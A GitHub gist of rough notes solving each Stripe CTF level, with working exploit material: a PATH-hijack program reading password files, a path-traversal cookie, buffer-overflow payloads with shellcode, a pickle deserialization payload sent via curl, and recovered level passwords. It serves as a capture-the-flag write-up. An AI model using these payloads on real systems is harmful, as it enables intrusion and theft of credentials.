michaelpetrov / gist:1899630
Created

Embed URL

HTTPS clone URL

SSH clone URL

You can clone with HTTPS or SSH.

Download Gist

Stripe CTF Challenge - Solutions to all Levels

View gist:1899630
Raw
File suppressed. Click to show.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 
Stripe CTF - Work Notes

mpetrov (petrov.michael@gmail.com)

 

These notes are very rough. They should give a general idea of how each level was solved.

 

---- LEVEL 01 (login: e9gx26YEb2) -----

Solution: modifying PATH env variable

Password: kxlVXUvzv

 

date.c

#include <sys/types.h>

#include <unistd.h>

#include <stdio.h>

int main(void) {

    printf(

        "         UID           GID  \n"

        "Real      %d  Real      %d  \n"

        "Effective %d  Effective %d  \n",

             getuid (),     getgid (),

             geteuid(),     getegid()

    );

	system("ls -la /home/level02/");

	system("cat /home/level02/.password");

    return 0;       /* always good to return something */

}

 

 

---- LEVEL 02 (login: kxlVXUvzv) -----

Solution: set cookie to: ../../home/level03/.password

Password: Or0m4UX07b 

 

 

 

 

---- LEVEL 03 (login: Or0m4UX07b) -----

Solution: negative index exploit

Password: i5cBbPvPCpcP

 

NotesROUGH NOTES:

- target function (using nm): 0x804875b 	run

- use gdb to break in truncate_and_call

- step through a bit

- get pointer of buf

- compare to pointer of fns

- -0x70 difference, negative index exploit about to work

- array pointers are 4 bytes apart

- run -26 $'./a.out\n\x5b\x87\x04\x08'

 

 

---- LEVEL 04 (login: i5cBbPvPCpcP) -----

Solution: buffer overflow exploit

Password: fzfDGnSmd317

 

 

ROUGH NOTES:

- some overflow...

- system is 0x890cec83

- "smashing the stack for fun and profit"

- brute force isolation of return pointer (1037 th character)

 

$'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\xd0\x23\x5d\xf7AAAAAAAAAAAA'

 

- printf("Usage: ./level04 STRING");, ./level04 is key (turned out to be irrelevant at the end)

- 0x080485b7:	 "./level04 STRING"

- gdb: x/x system 0xf75d23d0 <system>:	0x890cec83

- found "call *eax 804847f" in disassembly

- Shellcode creator: http://www.shell-storm.org/shellcode/files/utility-478.php

- Shellcode for "./a.out\n":

// 48 bytes

$'\x60\x6a\x0b\x58\x99\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x68\x2d\x63\x63\x63\x89\xe1\x52\xeb\x07\x51\x53\x89\xe1\xcd\x80\x61\xe8\xf4\xff\xff\xff\x2e\x2f\x61\x2e\x6f\x75\x74\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\x7f\x84\x04\x08AAAAAAAAAAAA'

 

 

 

---- LEVEL 05 (login: fzfDGnSmd317) -----

Solution: unpickle exploit

Password: SF2w8qU1QDj

 

 

 

ROUGH NOTES

- touch result.txt

- chmod 777 result.txt

- curl localhost:9020 -d $'test; job: cos\nsystem\n(S\'/tmp/tmp.jbvQGmqMNk/a.out\'\ntR.'

- exploit code (primitive but works): 

#include <sys/types.h>

#include <unistd.h>

#include <stdio.h>

int main(void) {

    printf(

        "         UID           GID  \n"

        "Real      %d  Real      %d  \n"

        "Effective %d  Effective %d  \n",

             getuid (),     getgid (),

             geteuid(),     getegid()

    );

	system("ls -la /home/level06/ >> /tmp/tmp.jbvQGmqMNk/result.txt");

	system("cat /home/level06/.password >> /tmp/tmp.jbvQGmqMNk/result.txt");

    return 0;       /* always good to return something */

}

 

cat result.txt

- SUCCESS!

 

 

---- LEVEL 06 (login: SF2w8qU1QDj) -----

Solution: timing attack on the fork system call

Details: https://gist.github.com/1899389

Password: theflagl0eFTtT5oi0nOTxO5

 

ROUGH NOTES:

- had to ssh through level05 for some reason (later was fixed)

- if stdout and stderr can be blocking then we can time their outputs and find where the wrong characters are

- http://stackoverflow.com/questions/280571/how-to-control-popen-stdin-stdout-stderr-redirection

- http://stackoverflow.com/questions/4057985/disabling-stdout-buffering-of-a-forked-process

- https://bugzilla.redhat.com/attachment.cgi?id=91467
evandrix commented

One-liner for level 02: curl --digest -u level02 -b user_details='../../home/level03/.password' http://ctf.stri.pe/level02.php

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Something went wrong with that request. Please try again.